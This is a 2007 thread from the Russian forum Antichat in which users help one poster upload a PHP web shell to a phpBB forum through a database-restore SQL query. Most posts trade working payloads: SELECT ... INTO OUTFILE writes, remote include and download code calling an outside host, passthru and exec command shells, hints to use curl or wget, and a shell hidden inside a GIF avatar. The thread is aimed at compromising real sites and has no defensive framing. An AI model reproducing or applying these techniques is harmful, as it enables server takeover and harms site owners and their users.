Форум АНТИЧАТ - Проблемы при заливке шелла

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Проблемы при заливке шелла (https://forum.antichat.xyz/showthread.php?t=43722)

Azter

04.07.2007 20:54

Проблемы при заливке шелла

Заливаю шелл через востановление базы в phpbb

Код:

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Код исполняется это факт, но когда захожу на
http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает.
Из-за чего такое может быть?

Y.Dmitriy

04.07.2007 20:56

в папке куда ты залил шел находится конфигурационный файл Апача...
с параметрами: "первый нах"(шутка, но только про имя параметра...)

maxster

04.07.2007 21:03

прав не хватает, что бы через бд файл заливать

Azter

04.07.2007 21:23

Цитата:

Сообщение от maxster

прав не хватает, что бы через бд файл заливать

не факт, обычно если не хватает прав, то вобще ничего не создается, и выбрасывает уведомления, а тут с этим все в порядке.

c411k

04.07.2007 21:31

если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале

Код:

SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

если при заходе на сцылко shell.php покажет те пшпинфо, то можешь заливать такой код

Код:

<? passthru($_GET[cmd]); ?>

потом юзай shell.php?cmd=ls

зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc )

The_HuliGun

04.07.2007 21:32

Возможно просто отключена возможность подключения удаленных файлов через include().
Создай файл с кодом

PHP код:


		
			
<?

 phpinfo();

?>

и посмотри на директуву allow_url_fopen, если она off, тогда через include() ничего не вийдет.

nightmare007

04.07.2007 21:38

попробуй

Код:

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php';

Azter

04.07.2007 21:57

Такс phpinfo - катит
allow_url_fopen - on.
Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =(
Хотя все ясно
allow_url_include - Off
Чем можно заменить include? кажется можно curl, но как?

Azter

04.07.2007 22:07

Кстати

Код:

<? passthru($_GET[cmd]); ?>

не катит, при запросе любой команды тоже белая страница когда просто запустил shell.php то квакнуло Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\путь_к_шелу

The_HuliGun

04.07.2007 22:44

Может быть safe_mode = on, тогда не команды не выполняются.

maxster

04.07.2007 23:01

попробуй багу с подменой аватарного пути

_http://forum.antichat.ru/showpost.php?p=281765&postcount=2

Spyder

04.07.2007 23:11

хз, пробуй <? exec($_GET[cmd]); ?>

Azter

05.07.2007 01:07

safe mode - off
Spyder
Не катит =(
maxster
А смысл? там-же тоже через инклуд(или ты о 7 способе?)

Scipio

05.07.2007 02:11

а если сделать так?

Код:

SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Да и с путями разберись

Azter

05.07.2007 12:41

Код:

SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

выбрасывает вот такую фигню

Цитата:

Warning: filesize() [function.filesize]: stat failed for http://host.narod.ru/files.txt in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

Warning: fread() [function.fread]: Length parameter must be greater than 0 in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

GrAmOzEkA
Пару раз уже говорил - не прокатит инклуд.

andy13

05.07.2007 19:28

Почему бы просто не сделать так:
<? passthru("команда"); ?>
если по-другому не получается ;)

Micr0b

05.07.2007 19:34

andy13 - читай пост c411k на 1 странице

c411k

05.07.2007 23:29

мдя. выставляешь в админке phpbb максимальный размер загруж авы 150кб, грузишь аву http://c411k.jino-net.ru/upload/achat.gif http://c411k.jino-net.ru/upload/achat.gif
бэкапишь бд с запросом

Код:

SELECT '<?php include("/avatars/achat.gif"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

и у тебя есть полноценный шелл от рст. если не можешь изменить размер, то рисуешь в фотошопе пиксель 1х1, сохраняешь, открываешь в HEX-редакторе и встявляешь в конец маленький по размеру шелл.

andy13

06.07.2007 09:01

Micr0b, я писал про вставку команд напрямую
passthru("uname -a; id ..."), а не про передачу их через запросы.

tbody

08.07.2007 17:48

А если там стоит ASP.Net без ПХП, то что тогда использовать?
Есть только возможность править страницу.

Время: 09:16